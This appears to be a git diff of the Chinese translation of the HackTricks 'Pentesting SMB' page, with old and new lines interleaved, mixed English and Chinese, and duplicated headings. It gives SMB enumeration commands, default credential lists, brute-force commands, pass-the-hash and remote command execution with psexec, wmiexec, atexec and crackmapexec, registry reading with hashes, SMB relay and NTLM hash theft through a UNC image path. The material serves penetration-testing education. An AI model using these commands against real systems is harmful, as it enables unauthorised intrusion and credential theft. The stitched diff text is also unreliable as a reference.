共享代表**本地文件系统的任意部分**可以由SMB服务器提供使得层次结构对客户端部分可**独立**于服务器的实际结构。**访问控制列表ACLs**定义**访问权限**,允许对用户权限进行**细粒度控制**,包括**`执行`**、**`读取`**和**`完全访问`**等属性。这些权限可以分配给个别用户或组,基于共享,与服务器上设置的本地权限不同。
共享代表 **本地文件系统的任意部分**,可以由 SMB 服务器提供,使得层次结构对客户端部分 **独立** 于服务器的实际结构可见。**访问控制列表 (ACLs)** 定义了 **访问权限**,允许对用户权限进行 **细粒度控制**,包括 **`执行`**、**`读取`** 和 **`完全访问`** 等属性。这些权限可以根据共享分配给单个用户或组,并且与服务器上设置的本地权限不同。
### IPC$ 共享
### IPC$ Share
通过匿名空会话可以访问IPC$共享,从而与通过命名管道公开的服务进行交互。实用工具`enum4linux`可用于此目的。正确使用它,可以获取:
可以通过匿名空会话访问 IPC$ 共享,从而与通过命名管道暴露的服务进行交互。实用工具 `enum4linux` 对此非常有用。正确使用时,它可以获取:
* 操作系统信息
* 父域的详细信息
* 本地用户和组的汇编
* 可用SMB共享的信息
* 可用 SMB 共享的信息
* 有效的系统安全策略
这一功能对于网络管理员和安全专业人员来评估网络上SMBServer Message Block服务的安全状况至关重要。`enum4linux`提供了目标系统SMB环境的全面视图这对于识别潜在漏洞并确保SMB服务得到适当保护至关重要
此功能对于网络管理员和安全专业人员评估网络上 SMB (服务器消息块) 服务的安全态势至关重要。`enum4linux` 提供了目标系统 SMB 环境的全面视图,这对于识别潜在漏洞和确保 SMB 服务得到适当保护是必不可少的
```bash
enum4linux -a target_ip
```
上述命令是`enum4linux`可能被用来对由`target_ip`指定的目标执行完整枚举的示例。
上述命令是如何使用 `enum4linux` 对指定的 `target_ip`行完整枚举的示例。
## 什么是NTLM
## 什么是 NTLM
如果你不知道什么是NTLM或者想了解它是如何工作以及如何滥用它你会发现这个关于**NTLM**的页面非常有趣,其中解释了**这个协议的工作原理以及如何利用它**
如果你不知道什么是 NTLM或者你想知道它是如何工作的以及如何利用它你会发现这页关于 **NTLM** 的内容非常有趣,其中解释了 **这个协议是如何工作的以及你如何利用它:**
{% content-ref url="../windows-hardening/ntlm/" %}
[ntlm](../windows-hardening/ntlm/)
@ -60,16 +61,16 @@ enum4linux -a target_ip
## **服务器枚举**
### **扫描**网络以搜索主机:
### **扫描** 网络以搜索主机:
```bash
nbtscan -r 192.168.0.1/24
```
### SMB 服务器版本
寻找 SMB 版本可能存在的漏洞,重要的是要知道正在使用的版本。如果这些信息在其他使用的工具中没有显示,您可以:
查找可能针对 SMB 版本的漏洞,了解正在使用的版本非常重要。如果此信息未在其他使用的工具中出现,您可以:
- 使用 **MSF** 辅助模块 **_auxiliary/scanner/smb/smb_version**
- 或者使用以下脚本:
* 使用 **MSF** 辅助模块 \_**auxiliary/scanner/smb/smb\_version**
* 或者这个脚本:
```bash
#!/bin/sh
#Author: rewardone
@ -86,17 +87,17 @@ tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
```
### **搜索漏洞利用**
### **搜索漏洞**
```bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
```
### **可能的**凭证
### **可能的** 凭据
| **用户名** | **常见密码** |
| **用户名** | **常见密码** |
| -------------------- | ----------------------------------------- |
| _(空白)_ | _(空白)_ |
| guest | _(空白)_ |
| _(空白)_ | _(空白)_ |
| guest | _(空白)_ |
| Administrator, admin | _(空白)_, password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
@ -105,9 +106,9 @@ searchsploit microsoft smb
### 暴力破解
* [**SMB暴力破解**](../generic-methodologies-and-resources/brute-force.md#smb)
* [**SMB 暴力破解**](../generic-methodologies-and-resources/brute-force.md#smb)
### SMB环境信息
### SMB 环境信息
### 获取信息
```bash
@ -131,9 +132,9 @@ rpcclient -U "username%passwd" <IP> #With creds
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
```
### 枚举用户、组和登录用户
### 枚举用户、组和登录用户
这些信息应该已经从enum4linux和enum4linux-ng中收集到
这些信息应该已经从 enum4linux 和 enum4linux-ng 收集
```bash
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
@ -151,7 +152,7 @@ enumdomgroups
```bash
lookupsid.py -no-pass hostname.local
```
一句话
Oneliner
```bash
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
```
@ -173,7 +174,7 @@ run
`xdg-open smb://cascade.htb/`
#### 在文件浏览器窗口中nautilusthunar 等)
#### 在文件浏览器窗口中nautilus, thunar 等)
`smb://friendzone.htb/general/`
@ -181,7 +182,7 @@ run
### 列出共享文件夹
始终建议查看是否可以访问任何内容,如果没有凭据,请尝试使用**null凭据/访客用户**。
始终建议查看是否可以访问任何内容,如果没有凭据,请尝试使用 **null** **凭据/访客用户**
```bash
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
@ -207,11 +208,11 @@ smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
```
### **手动枚举Windows共享并连接到它们**
### **手动枚举 Windows 共享并连接到它们**
可能您被限制显示主机机器的任何共享,当您尝试列出它们时,似乎没有任何共享可供连接。因此,尝试手动连接到共享可能是值得一试的。要手动枚举共享您可能希望查找像NT\_STATUS\_ACCESS\_DENIED和NT\_STATUS\_BAD\_NETWORK\_NAME这样的响应当使用有效会话例如空会话或有效凭据时。这些可能表明共享是否存在但您无权访问,或者共享根本不存在。
可能您被限制显示主机的任何共享,当您尝试列出它们时,似乎没有任何共享可供连接。因此,尝试手动连接到共享可能是值得的。要手动枚举共享,您可能想要查找像 NT\_STATUS\_ACCESS\_DENIED 和 NT\_STATUS\_BAD\_NETWORK\_NAME 这样的响应,当使用有效会话(例如,空会话或有效凭据)时。这些可能表明共享是否存在以及您是否没有访问权限,或者共享根本不存在。
Windows目标的常见共享名称包括
Windows 目标的常见共享名称包括
* C$
* D$
@ -222,14 +223,14 @@ Windows目标的常见共享名称包括
* SYSVOL
* NETLOGON
来自_**网络安全评估第3版**_
(来自 _**网络安全评估 第3版**_ 的常见共享名称
您可以尝试使用以下命令连接到它们
```bash
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
```
者使用此脚本(使用空会话)
或此脚本(使用空会话)
```bash
#/bin/bash
@ -246,48 +247,7 @@ echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD
fi
done
```
### Examples
#### Enumerating SMB Shares
To list available SMB shares on a target machine, you can use tools like `smbclient` or `smbmap`.
```bash
smbclient -L //<target_ip>
```
```bash
smbmap -H <target_ip>
```
#### Mounting SMB Shares
You can mount an SMB share on your machine using the `mount` command.
```bash
sudo mount -t cifs //<target_ip>/<share_name> /mnt/smb -o username=<username>,password=<password>
```
#### Accessing SMB Shares
Once you have enumerated and mounted SMB shares, you can access them like any other directory on your system.
```bash
cd /mnt/smb
ls
```
#### Uploading and Downloading Files
You can upload and download files to and from SMB shares using tools like `smbclient` or `smbget`.
```bash
smbclient //<target_ip>/<share_name> -c 'put <local_file>; get <remote_file>'
```
```bash
smbget smb://<target_ip>/<share_name>/<remote_file>
```
示例
```bash
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
@ -304,23 +264,21 @@ get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
```
CMD控制台
CMD 控制台
```shell
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
```
### MMC Snap-in (图形化)
在Windows系统中MMC Snap-in是一种可扩展的管理控制台工具用于管理各种系统组件和服务。MMC Snap-in提供了图形化界面使用户可以轻松地管理和配置系统设置。
MMC 快捷工具(图形)
```shell
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
```
explorer.exe(图形化),输入 `\\<ip>\` 查看可用的非隐藏共享。
explorer.exe (图形界面),输入 `\\<ip>\`查看可用的非隐藏共享。
### 挂载共享文件夹
```bash
@ -329,7 +287,7 @@ mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
```
### **下载文件**
阅读前面的部分以了解如何使用凭据/Pass-the-Hash 连接。
阅读前面的部分以了解如何使用凭据/Pass-the-Hash 进行连接。
```bash
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
@ -344,55 +302,64 @@ smbclient //<IP>/<share>
> mget *
#Download everything to current directory
```
### 域共享文件夹搜索
Commands:
* mask: 指定用于过滤目录中文件的掩码(例如,""表示所有文件)
* recurse: 切换递归开关(默认:关闭)
* prompt: 切换文件名提示开关(默认:开启)
* mget: 将与掩码匹配的所有文件从主机复制到客户端机器
(_来自smbclient的手册信息_)
### Domain Shared Folders Search
* [**Snaffler**](https://github.com/SnaffCon/Snaffler)\*\*\*\*
```bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data
```
* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) 蜘蛛。
* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) 爬虫
* `-M spider_plus [--share <share_name>]`
* `--pattern txt`
```bash
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
```
特别有趣的是共享文件中的名为**`Registry.xml`**的文件,因为它们**可能包含**通过组策略配置了**自动登录**的用户的密码。或者**`web.config`**文件,因为它们包含凭据。
特别有趣的共享文件是名为 **`Registry.xml`** 的文件,因为它们 **可能包含密码**,用于通过组策略配置的 **autologon** 用户。或者 **`web.config`** 文件,因为它们包含凭据。
{% hint style="info" %}
**SYSVOL共享**可被域中所有经过身份验证的用户**读取**。在其中,您可能会**找到**许多不同的批处理、VBScript和PowerShell**脚本**。\
您应该**检查**其中的**脚本**,因为您可能会**找到**诸如**密码**之类的敏感信息
**SYSVOL 共享** 对域中的所有经过身份验证的用户 **可读**。在这里,您可能会 **找到** 许多不同的批处理、VBScript 和 PowerShell **脚本**。\
您应该 **检查** 其中的 **脚本**,因为您可能会 **发现** 敏感信息,例如 **密码**
{% endhint %}
## 读取注册表
您可以尝试使用一些发现的凭据**读取注册表**。Impacket **`reg.py`**允许您尝试:
您可能能够使用一些发现的凭据 **读取注册表**。Impacket **`reg.py`** 允许您尝试:
```bash
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
```
## 后渗透
## Post Exploitation
**Samba** 服务器的默认配置通常位于 `/etc/samba/smb.conf`,可能包含一些危险配置:
**Samba** 服务器的 **默认配置** 通常位于 `/etc/samba/smb.conf`,可能包含一些 **危险配置**
| **设置** | **描述** |
| ------------------------- | --------------------------------------------------------------- |
| `browseable = yes` | 允许列出当前共享中可用共享 |
| `read only = no` | 禁止创建和修改文件 |
| `writable = yes` | 允许用户创建和修改文件 |
| `guest ok = yes` | 允许在不使用密码的情况下连接到服务 |
| `enable privileges = yes` | 是否尊重分配给特定 SID 的权限? |
| `create mask = 0777` | 新创建的文件必须分配什么权限? |
| `directory mask = 0777` | 新创建的目录必须分配什么权限? |
| `logon script = script.sh`| 用户登录时需要执行哪个脚本? |
| `magic script = script.sh`| 脚本关闭时应执行哪个脚本? |
| `magic output = script.out`| 魔术脚本的输出应存储在哪里? |
| **设置** | **描述** |
| --------------------------- | --------------------------------------------------------------- |
| `browseable = yes` | 允许列出当前共享中可用共享? |
| `read only = no` | 禁止创建和修改文件? |
| `writable = yes` | 允许用户创建和修改文件? |
| `guest ok = yes` | 允许在不使用密码的情况下连接到服务? |
| `enable privileges = yes` | 尊重分配给特定 SID 的权限? |
| `create mask = 0777` | 新创建的文件必须分配什么权限? |
| `directory mask = 0777` | 新创建的目录必须分配什么权限? |
| `logon script = script.sh` | 用户登录时需要执行哪个脚本? |
| `magic script = script.sh` | 脚本关闭时应执行哪个脚本? |
| `magic output = script.out` | 魔法脚本的输出需要存储在哪里? |
命令 `smbstatus` 提供有关服务器和连接到服务器的用户的信息。
命令 `smbstatus` 提供有关 **服务器****谁已连接** 的信息。
## 使用 Kerberos 进行身份验证
## Authenticate using Kerberos
您可以使用工具 **smbclient****rpcclient** **kerberos** 进行身份验证:
您可以使用工具 **smbclient****rpcclient** 进行 **kerberos**证:
```bash
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
@ -401,7 +368,7 @@ rpcclient -k ws01win10.domain.com
### **crackmapexec**
crackmapexec可以利用**mmcexec, smbexec, atexec, wmiexec**中的任何一个来执行命令,其中**wmiexec**是默认方法。您可以使用参数`--exec-method`指定要使用的选项:
crackmapexec 可以通过 **mmcexec, smbexec, atexec, wmiexec** 中的任何一种方法 **执行命令**,其中 **wmiexec****默认** 方法。您可以使用参数 `--exec-method` 指定您希望使用的选项:
```bash
apt-get install crackmapexec
@ -425,9 +392,9 @@ crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
```
### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)
这两个选项都会在受害者机器上**创建一个新服务**(通过 SMB 使用 _\pipe\svcctl_),并使用它来**执行某些操作****psexec** 将**上传**一个可执行文件到 ADMIN$ 共享,而 **smbexec** 将指向 **cmd.exe/powershell.exe**在参数中放入有效负载 --**无文件技术-**-)。\
有关 [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)和 [**smbexec**](../windows-hardening/ntlm/smbexec.md)的**更多信息**。\
**kali** 上的位置为 /usr/share/doc/python3-impacket/examples/
这两个选项将**在受害者机器上创建一个新服务**(通过 SMB 使用 _\pipe\svcctl_),并利用它来**执行某些操作****psexec** 将**上传**一个可执行文件到 ADMIN$ 共享,而 **smbexec** 将指向 **cmd.exe/powershell.exe**将有效载荷作为参数放入 --**无文件技术-**-)。\
有关 [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md) 和 [**smbexec**](../windows-hardening/ntlm/smbexec.md) 的**更多信息**。\
**kali** 中,它位于 /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
@ -435,19 +402,19 @@ crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
```
使用**参数**`-k`,您可以针对**kerberos**进行身份验证,而不是**NTLM**
使用 **参数**`-k`,您可以使用 **kerberos** 进行身份验证,而不是 **NTLM**
### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec
### [wmiexec](../windows-hardening/ntlm/wmiexec.md)/dcomexec
通过**端口135**使用DCOM执行命令shell而不触及磁盘或运行新服务。\
在**kali**中,它位于/usr/share/doc/python3-impacket/examples/
通过 **端口 135** 隐秘地执行命令 shell而不接触磁盘或运行新服务使用 DCOM。\
**kali** 中,它位于 /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
```
使用**参数**`-k`,您可以针对**kerberos**进行身份验证,而不是**NTLM**。
使用 **parameter**`-k` 你可以使用 **kerberos** 进行身份验证,而不是 **NTLM**
```bash
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
@ -456,8 +423,8 @@ psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass
```
### [AtExec](../windows-hardening/ntlm/atexec.md)
通过任务计划程序执行命令(使用 SMB 上的 _\pipe\atsvc_)。\
**kali** 上的路径为 /usr/share/doc/python3-impacket/examples/
通过任务调度程序执行命令(使用 _\pipe\atsvc_ 通过 SMB)。\
**kali** 中位于 /usr/share/doc/python3-impacket/examples/
```bash
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
@ -468,42 +435,42 @@ psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass
## **暴力破解用户凭证**
**这不是推荐的做法,如果尝试次数超过最大允许次数,可能会导致账户被封锁**
**这不推荐,如果超过允许的最大尝试次数,您可能会锁定账户**
```bash
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
```
## SMB中继攻击
## SMB relay attack
该攻击利用Responder工具在内部网络上**捕获SMB身份验证会话**,并将其**中继**到**目标机器**。如果身份验证**会话成功**,它将自动将您**转移到系统** **shell**。\
[**有关此攻击的更多信息,请单击此处。**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
此攻击使用 Responder 工具包来 **捕获内部网络上的 SMB 认证会话**,并将其 **中继****目标机器**。如果认证 **会话成功**,它将自动将您带入 **系统** **shell**。\
[**有关此攻击的更多信息请点击这里。**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
## SMB-Trap
Windows库URLMon.dll在页面尝试通过SMB访问某些内容时会自动尝试对主机进行身份验证,例如:`img src="\\10.10.10.10\path\image.jpg"`
当页面尝试通过 SMB 访问某些内容时Windows 库 URLMon.dll 会自动尝试对主机进行身份验证,例如: `img src="\\10.10.10.10\path\image.jpg"`
这发生在以下功能中:
这发生在以下函数中:
* URLDownloadToFile
* URLDownloadToCache
* URLOpenStream
* URLOpenBlockingStream
这些功能被一些浏览器和工具如Skype使用
这些函数被一些浏览器和工具(如 Skype使用。
![源:http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>)
![自: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>)
### 使用MitMf的SMBTrap
### SMBTrap using MitMf
![源:http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>)
![自: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>)
## NTLM窃取
## NTLM Theft
类似于SMB陷阱通过在目标系统上植入恶意文件通过SMB例如可以引发SMB身份验证尝试从而允许使用工具如Responder拦截NetNTLMv2哈希。然后可以离线破解哈希或在[SMB中继攻击](pentesting-smb.md#smb-relay-attack)中使用。
与 SMB 捕获类似,将恶意文件植入目标系统(例如通过 SMB可以引发 SMB 认证尝试,从而允许使用 Responder 等工具拦截 NetNTLMv2 哈希。然后可以离线破解该哈希或在 [SMB relay attack](pentesting-smb.md#smb-relay-attack) 中使用。
[查看ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)
[查看: ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)
## HackTricks自动命令
## HackTricks Automatic Commands
```
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
@ -572,16 +539,17 @@ Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
```
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
其他支持HackTricks的方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

225
network-services-pentesting/pentesting-smb/README.md
View file

@ -1,58 +1,59 @@
# 139,445 - SMB 渗透测试
# 139,445 - Pentesting SMB
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## **端口 139**
## **Port 139**
_**网络基本输入输出系统** (NetBIOS)_**NetBIOS** 是一种软件协议旨在使局域网LAN中的应用程序、个人计算机和台式机能够与网络硬件进行交互并**促进网络数据的传输**。通过它们的 NetBIOS 名称,可以识别和定位在 NetBIOS 网络上运行的软件应用程序,这些名称最多可以有 16 个字符,并且通常与计算机名称不同。两个应用程序之间的 NetBIOS 会话是在一个应用程序(作为客户端)向另一个应用程序(作为服务器)发出“呼叫”命令时启动的,利用**TCP 端口 139**
_**网络基本输入输出系统**_** (NetBIOS)** 是一种软件协议,旨在使局域网 (LAN) 内的应用程序、个人电脑和桌面能够与网络硬件交互,并**促进数据在网络上的传输**。通过其 NetBIOS 名称(长度可达 16 个字符,通常与计算机名称不同),可以识别和定位在 NetBIOS 网络上运行的软件应用程序。当一个应用程序(充当客户端)发出命令“呼叫”另一个应用程序(充当服务器)时,两个应用程序之间的 NetBIOS 会话通过**TCP 端口 139**启动
```
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```
## 端口445
## Port 445
从技术上讲,端口139被称为“NBT over IP”而端口445被标识为“SMB over IP”。缩写**SMB**代表“**Server Message Blocks**”,也被现代称为**Common Internet File System (CIFS)**。作为一个应用层网络协议SMB/CIFS主要用于实现文件、打印机、串行端口的共享访问,并促进网络中节点之间各种形式的通信。
从技术上讲,端口 139 被称为“NBT over IP”而端口 445 被识别为“SMB over IP”。缩写 **SMB** 代表“**服务器消息块**”,现代也被称为 **通用互联网文件系统 (CIFS)**。作为一种应用层网络协议SMB/CIFS 主要用于实现对文件、打印机、串口的共享访问,并促进网络中节点之间各种形式的通信。
例如,在Windows环境中突出显示SMB可以直接通过TCP/IP运行消除了对NetBIOS over TCP/IP的必要性通过利用端口445。相反在不同的系统上观察到使用端口139表明SMB与NetBIOS over TCP/IP一起执行。
例如,在 Windows 的上下文中,强调 SMB 可以直接通过 TCP/IP 操作,从而消除了通过端口 445 使用 NetBIOS over TCP/IP 的必要性。相反,在不同的系统上,观察到使用端口 139表明 SMB 正在 NetBIOS over TCP/IP 一起执行。
```
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```
### SMB
**服务器消息块SMB**协议采用**客户端-服务器**模型运行,旨在管理**文件**、目录和打印机、路由器等网络资源的访问。SMB主要用于**Windows**操作系统系列确保向后兼容性使具有较新版本Microsoft操作系统的设备能够与运行较旧版本的设备无缝交互。此外**Samba**项目提供了一个免费软件解决方案,可以在**Linux**和Unix系统上实现SMB从而通过SMB促进跨平台通信。
**服务器消息块 (SMB)** 协议在 **客户端-服务器** 模型中运行,旨在调节对 **文件**、目录和其他网络资源(如打印机和路由器)的 **访问**。主要用于 **Windows** 操作系统系列SMB 确保向后兼容性,使得运行较新版本微软操作系统的设备能够与运行较旧版本的设备无缝交互。此外,**Samba** 项目提供了一个免费软件解决方案,使 SMB 能够在 **Linux** 和 Unix 系统上实现,从而通过 SMB 促进跨平台通信。
共享代表**本地文件系统的任意部分**可以由SMB服务器提供使得层次结构对客户端部分可**独立**于服务器的实际结构。**访问控制列表ACLs**定义**访问权限**,允许对用户权限进行**细粒度控制**,包括**`执行`**、**`读取`**和**`完全访问`**等属性。这些权限可以根据共享分配给个用户或组,并且与服务器上设置的本地权限不同。
共享,代表 **本地文件系统的任意部分**,可以由 SMB 服务器提供,使得客户端部分 **独立** 于服务器的实际结构可见。**访问控制列表 (ACLs)** 定义了 **访问权限**,允许对用户权限进行 **细粒度控制**,包括 **`执行`**、**`读取`** 和 **`完全访问`** 等属性。这些权限可以根据共享分配给个用户或组,并且与服务器上设置的本地权限不同。
### IPC$ 共享
### IPC$ Share
通过匿名空会话可以访问IPC$共享,从而与通过命名管道公开的服务进行交互。实用程序`enum4linux`对此很有用。正确使用它可以获取:
可以通过匿名空会话访问 IPC$ 共享,从而与通过命名管道暴露的服务进行交互。实用工具 `enum4linux` 对此非常有用。正确使用时,它可以获取:
- 操作系统信息
- 父域的详细信息
- 本地用户和组的汇编
- 可用SMB共享的信息
- 有效的系统安全策略
* 操作系统信息
* 父域的详细信息
* 本地用户和组的汇编
* 可用 SMB 共享的信息
* 有效的系统安全策略
